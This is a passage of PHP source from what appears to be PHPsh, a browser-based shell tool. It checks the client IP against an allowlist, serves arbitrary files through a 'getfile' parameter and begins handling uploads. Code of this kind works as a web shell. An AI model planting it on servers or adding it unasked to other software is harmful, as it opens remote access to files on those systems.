set_magic_quotes_runtime(0); ini_set('magic_quotes_gpc', 0); /* Important security check!! */ $allowAccess = FALSE; if (array_key_exists('REMOTE_ADDR', $_SERVER)) { foreach ($PHPshConfig['allowedIPs'] as $ip) { if ($ip == $_SERVER['REMOTE_ADDR']) { $allowAccess = TRUE; } } } $shell = new PHPsh(); $CurDir = $shell->currentDir(); $Command = NULL; $OutputEscapeFlag = TRUE; $MySess =& $shell->getSession(); if (array_key_exists($PHPshConfig['sesskeys']['escape'], $MySess)) { $OutputEscapeFlag = $MySess[$PHPshConfig['sesskeys']['escape']]; } /* Take care of getfile requests right away, using the escape flag from session */ if ($allowAccess) { if (is_array($_GET)) { if (array_key_exists('getfile', $_GET)) { $shell->showFile($_GET['getfile'], $OutputEscapeFlag); exit(1); } } } $HaveUpload = FALSE; if (is_array($_FILES) && array_key_exists('uploadfile', $_FILES) && is_array($_FILES['uploadfile']) && array_key_exists('name', $_FILES['uploadfile']) && strlen($_FILES['uploadfile']['name']) && array_key_exists('tmp_name', $_FILES['uploadfile']) && $_FILES['uploadfile']['tmp_name']) { $HaveUpload = TRUE;